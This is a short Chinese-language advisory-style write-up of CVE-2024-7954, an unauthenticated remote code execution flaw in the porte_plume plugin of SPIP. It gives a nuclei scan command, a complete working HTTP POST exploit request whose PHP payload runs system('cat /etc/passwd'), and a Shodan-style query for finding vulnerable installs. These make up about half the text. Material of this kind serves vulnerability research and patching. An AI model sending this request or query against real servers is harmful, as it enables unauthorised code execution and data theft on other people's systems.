SPIP 4.30-alpha2、4.2.13 和 4.1.16 之前版本所使用的 porte_plume 插件易受严重的任意代码执行 (RCE) 漏洞影响。该缺陷允许远程未授权攻击者通过构造特定的 HTTP 请求,以 SPIP 用户身份执行任意 PHP 代码。利用该漏洞的潜在后果严重,攻击者可在服务器上运行恶意命令,可能导致未授权访问、数据泄露或进一步系统受损。
##Nuclei 扫描
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml
可用于利用此漏洞的构造的 HTTP 请求示例如下:
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
POST 请求指向 SPIP 的 index.php 文件中的 porte_plume_previsu 动作。system() 函数执行命令(本例中为 cat /etc/passwd)的有效载荷,用于读取密码文件内容。system() 函数中的命令,攻击者可以在服务器上执行任意 PHP 代码,导致严重后果。要识别可能存在漏洞的 SPIP 安装,可使用以下 Shodan 搜索查询:
app="SPIP"
此漏洞凸显了保持软件更新和实施强大安全措施以防止利用的重要性。